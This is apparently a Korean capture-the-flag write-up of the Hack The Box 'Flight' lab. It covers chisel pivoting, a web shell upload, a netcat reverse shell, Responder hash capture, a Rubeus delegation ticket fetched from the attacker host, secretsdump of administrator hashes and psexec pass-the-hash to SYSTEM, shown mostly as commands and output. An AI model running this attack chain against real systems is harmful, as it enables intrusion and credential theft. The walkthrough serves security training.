TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4
[...SNIP...]
4.2. Pivoting & Tunneling
하지만 다이렉트로 내부망에서 서비스하는 8000 포트에 접근할 수 없으므로 피봇팅을 통해서 내부 네트워크에 서비스 하는 것을 가져올 것이다.
이를 위해서 우리는 chisel 이라는 툴을 사용할 것이다. kali 를 서버로 열고 8000번 포트에 연결을 기다릴 것이다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# ./chisel_1.11.3_linux_arm64 server -p 8000 --reverse
2025/12/22 13:28:21 server: Reverse tunnelling enabled
2025/12/22 13:28:21 server: Fingerprint b0Twrsw/gLWr2mNX4vpCIUcp70wZiGmPVzwn+WprnYc=
2025/12/22 13:28:21 server: Listening on http://0.0.0.0:8000
그 다음 리버스 쉘 모드를 통해서 Kali 로 연결을 시도한다. 그리고 연결이 됐다는 메시지가 나온다.
C:\ProgramData>.\c client 10.10.14.143:8000 R:8001:127.0.0.1:8000
.\c client 10.10.14.143:8000 R:8001:127.0.0.1:8000
2025/12/22 08:35:31 client: Connecting to ws://10.10.14.143:8000
2025/12/22 08:35:33 client: Connected (Latency 188.9217ms)
성공적으로 연결이 됐다면 아래와 같은 주소로 정상적으로 접근이 가능하다.
4.3. 내부 파일 생성
내부에 임의의 파일을 생성한다. 여기서 inetpub 는 Microsoft 의 IIS 서비스의 기본 폴더다. 즉, 웹 서비스를 하는 폴더이고 그 중에 development 폴더 내부가 웹 서비스를 실질적으로 하는 폴더라고 확인했다. 그래서 그 안에다가 test.txt 를 임의로 만들어 보고 정상 접근되는지 확인했다.
C:\inetpub\development>echo "test" > test.txt
echo "test" > test.txt
그 결과 정상 접근이 되는 것을 확인할 수 있었다.
4.4. 웹쉘 업로드
그러고 나서 여기다가 이미 만들어진 웹쉘을 올릴 것이다. c.bum 의 계정으로는 권한상승이 어렵기 때문에 다른 계정을 탈취할 것이다. 그러기 위해서 cmd.aspx 를 이용할 것인데, 바로 업로드가 어렵기 때문에 smbclient 로 먼저 웹쉘을 업로드 하고, 해당 웹쉘을 현재의 폴더로 복사하는 방식을 사용할 것이다.
C:\inetpub\development>copy \xampp\htdocs\cmd.aspx .
copy \xampp\htdocs\cmd.aspx .
1 file(s) copied.
C:\inetpub\development>
정상적으로 업로드를 했다면 아래와 같이 확인할 수 있다. net user 명령어를 쳐서 먼저 정상적으로 작동하는 지를 확인한다.
4.5. 리버스 쉘 연결
그래서 다시 nc 파일을 이용해서 내 kali 로 리버스 쉘을 붙인다.
피봇팅된 서버를 통해서 리버스 쉘을 붙이면 defaultapppool 계정의 권한을 획득할 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.43.56] 49937
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
5. 권한 상승
5.1.
여기서 관심을 갖고 봐야 할 점은 defaultapppool 계정은 Microsoft 의 가상 계정이다. 이 계정의 특징 중 하나는 네트워크를 통해 인증 시도 시 해당 서버의 머신 계정 자격으로 인증을 수행한다는 것이다.
그렇기 때문에 내 kali 에다가 responder 를 실행시키고 공유폴더로 아무거나 전송을 시도한다.
c:\windows\system32\inetsrv>net use \\10.10.14.143\anything
net use \\10.10.14.143\anything
Enter the user name for '10.10.14.143': System error 1223 has occurred.
The operation was canceled by the user.
그러면 아래와 같이 해쉬값을 확인할 수 있는데 이 중에서 G0 이라는 부분이 눈에 띈다. 가장 확실한 추론은 해당 부분이 컴퓨터(머신)의 이름이라는 것이다.
[!] Error starting TCP server on port 80, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.129.43.56
[SMB] NTLMv2-SSP Username : flight\G0$
[SMB] NTLMv2-SSP Hash : G0$::flight:894fb6b4c4c0039a:EAFC5B68D96D4DCA408E059F24A747A2:010100000000000000264AD59573DC01C084435007DF34F400000000020008004F00520042004C0001001E00570049004E002D00450058003100310035004D004C00580042005500430004003400570049004E002D00450058003100310035004D004C0058004200550043002E004F00520042004C002E004C004F00430041004C00030014004F00520042004C002E004C004F00430041004C00050014004F00520042004C002E004C004F00430041004C000700080000264AD59573DC01060004000200000008003000300000000000000000000000003000008858D0E3D5E872BDD08C0735956C0E25ED2B358EB0F3556950A124025D4F605C0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340033000000000000000000
C:\ProgramData>powershell wget 10.10.14.143/Rubeus.exe -outfile rubeus.exe
powershell wget 10.10.14.143/Rubeus.exe -outfile rubeus.exe
C:\ProgramData>.\rubeus.exe tgtdeleg /nowrap
.\rubeus.exe tgtdeleg /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation request success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: VBZDRTG8ihJ89ssfs3FEWLeAXLnOQPqhC5HjWccrHyU=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECoCocVPpcBgl1wtS1/537YgYVrwDqlh3J1ad7UQGlmT5Pvm/N8FzEAzz0QzNjam3xLJJM+XMn7BA410lobkQwRWATBFu4oD0dBDN2OTE+QP8aP1/eTm0SgMXY/NvJz4OdJfRzZHetg1BcJMDENmjBPQr1OiwfviKH7Q4ILqWcgQAmhQaGMLNYGhw9Lg406LbXwafOMf+7VKhGvaOHMUBjfO+cRVOuwIlNAfZoC1D2Xy+uN10/UthZv1sCRg2a0ujI0bmBhOZsEdgFhAD0tmLD8ut7Rh+S1byZZ3VlgixU+Ak5ZW1u6P1GX9LcwrsgMAnmuwBIEOmFSPVMuyRWkCAMxwZtYFnaHCgDSaz9zyrRqFjRVwYDlq2CC0Th9/vuPYy2uiYfzi3u5Yqr2yk8GsNkltwPGfHZ8kM5zl0MXbER2PomALkJGLe5z5XnBjAhTYK5zzRQ0OKqcbHwHGG0iDAEoh2Q/AIfOfWhRf9cl2NocukyG9qNuBO9ZvWguUKLsGrNMxXt5JqNnzoALa8nfXPxNSFfuhmwa18FmV7RZPpZc+ljXbCyNpr29FcFMmagR5CNFfhrW1A9uHPEt6WRweecDhmnyZktIfULuUno/I4AwjmP4xhC2kZUH1j9V6EpvkIWLutBLk+vhH9+CdUz8+g9q8RH38qjVu3NUEuQ9yhu+JMdBINgxM6TM5lMwHQo/HB9nKa9J989O7IykaA1P9I9l59n6tX9lszdagtq3O/RG4XZTOMMBwZHQX48Aqhwu7Xbm+adid/dF9/zg92LB/JMyf6JzITsWiI9WDQac+cAvA/vKxY3nzCCwG3Q1VxCiNHZIzn7HWbOAxlHy2d33BP2OiUpUrdY6h1G07UhoZmW1iwhChVb6bBhI/CBHoToTavy6XgA0+SjBEXoKmhngddpVMpbs1KPviADZcrPlEpj+hNWUHs80X2pY9Xtheq6qwCHXl0Gv91WJbEwtWcTmAYBzWuQVABLi0rjXGCc68piYy11JMyq7I4DIMdL4wCxx53I1SVQM4pShCUrI7UqHdfGlQZQmfvkiCcJ+riG8bqN41ek2+TvESHH0OV9r6lXScMVRYgIZXDSjzKD0qfVtgCWGn+CjN7Xl4Nyy4ThL4Y1/f97B9eJLlT+y/tenoMl9FrEYFzR2BKN2sIujnD1X4V7Z9EyJFanlu2NSmkBRhIdtWlIeIvxOZ0V7c25ut6C2ZirId/ArMxrPJlxRxENrK5wPh26txLbyPirWJIuIyIerJ77wpzTAcaEKyZDIfW3aOop1KmaiDBd16y5Rv6VRH6hITNZyZF4ORdufvqvUX8cADegstLJdKUBgwLGd9e//ELURK0JzAxKYbAWGxmofMBdVSxbhHJtiFKzr0No4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQg1k54i71UyzKUa3VT2a9r6ZftFc0XJuF/aJ1WQXP4jxWhDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MTIyMjE2NDI1MFqmERgPMjAyNTEyMjMwMjQyNTBapxEYDzIwMjUxMjI5MTY0MjUwWqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# echo 'doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECoCocVPpcBgl1wtS1/537YgYVrwDqlh3J1ad7UQGlmT5Pvm/N8FzEAzz0QzNjam3xLJJM+XMn7BA410lobkQwRWATBFu4oD0dBDN2OTE+QP8aP1/eTm0SgMXY/NvJz4OdJfRzZHetg1BcJMDENmjBPQr1OiwfviKH7Q4ILqWcgQAmhQaGMLNYGhw9Lg406LbXwafOMf+7VKhGvaOHMUBjfO+cRVOuwIlNAfZoC1D2Xy+uN10/UthZv1sCRg2a0ujI0bmBhOZsEdgFhAD0tmLD8ut7Rh+S1byZZ3VlgixU+Ak5ZW1u6P1GX9LcwrsgMAnmuwBIEOmFSPVMuyRWkCAMxwZtYFnaHCgDSaz9zyrRqFjRVwYDlq2CC0Th9/vuPYy2uiYfzi3u5Yqr2yk8GsNkltwPGfHZ8kM5zl0MXbER2PomALkJGLe5z5XnBjAhTYK5zzRQ0OKqcbHwHGG0iDAEoh2Q/AIfOfWhRf9cl2NocukyG9qNuBO9ZvWguUKLsGrNMxXt5JqNnzoALa8nfXPxNSFfuhmwa18FmV7RZPpZc+ljXbCyNpr29FcFMmagR5CNFfhrW1A9uHPEt6WRweecDhmnyZktIfULuUno/I4AwjmP4xhC2kZUH1j9V6EpvkIWLutBLk+vhH9+CdUz8+g9q8RH38qjVu3NUEuQ9yhu+JMdBINgxM6TM5lMwHQo/HB9nKa9J989O7IykaA1P9I9l59n6tX9lszdagtq3O/RG4XZTOMMBwZHQX48Aqhwu7Xbm+adid/dF9/zg92LB/JMyf6JzITsWiI9WDQac+cAvA/vKxY3nzCCwG3Q1VxCiNHZIzn7HWbOAxlHy2d33BP2OiUpUrdY6h1G07UhoZmW1iwhChVb6bBhI/CBHoToTavy6XgA0+SjBEXoKmhngddpVMpbs1KPviADZcrPlEpj+hNWUHs80X2pY9Xtheq6qwCHXl0Gv91WJbEwtWcTmAYBzWuQVABLi0rjXGCc68piYy11JMyq7I4DIMdL4wCxx53I1SVQM4pShCUrI7UqHdfGlQZQmfvkiCcJ+riG8bqN41ek2+TvESHH0OV9r6lXScMVRYgIZXDSjzKD0qfVtgCWGn+CjN7Xl4Nyy4ThL4Y1/f97B9eJLlT+y/tenoMl9FrEYFzR2BKN2sIujnD1X4V7Z9EyJFanlu2NSmkBRhIdtWlIeIvxOZ0V7c25ut6C2ZirId/ArMxrPJlxRxENrK5wPh26txLbyPirWJIuIyIerJ77wpzTAcaEKyZDIfW3aOop1KmaiDBd16y5Rv6VRH6hITNZyZF4ORdufvqvUX8cADegstLJdKUBgwLGd9e//ELURK0JzAxKYbAWGxmofMBdVSxbhHJtiFKzr0No4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQg1k54i71UyzKUa3VT2a9r6ZftFc0XJuF/aJ1WQXP4jxWhDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MTIyMjE2NDI1MFqmERgPMjAyNTEyMjMwMjQyNTBapxEYDzIwMjUxMjI5MTY0MjUwWqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC' > ticket.kirbi
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# cat ticket.kirbi | base64 -d > ticket_binary.kirbi
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# impacket-ticketConverter ticket_binary.kirbi ticket.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# export KRB5CCNAME=ticket.ccache
시간 맞추기
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# curl -I flight.htb
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2025 16:49:05 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
Last-Modified: Thu, 24 Feb 2022 05:58:10 GMT
ETag: "1b9d-5d8bd444f0080"
Accept-Ranges: bytes
Content-Length: 7069
Content-Type: text/html
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# sudo timedatectl set-ntp off
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# sudo ntpdate g0.flight.htb
2025-12-22 20:50:22.241757 (+0400) +25199.886389 +/- 0.093053 g0.flight.htb 10.129.43.56 s1 no-leap
CLOCK: time stepped by 25199.886389
secretsdump 를 이용한 administrator NTLM 해쉬 추출
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# impacket-psexec administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file royYITVY.exe
[*] Opening SVCManager on flight.htb.....
[*] Creating service Snxb on flight.htb.....
[*] Starting service Snxb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system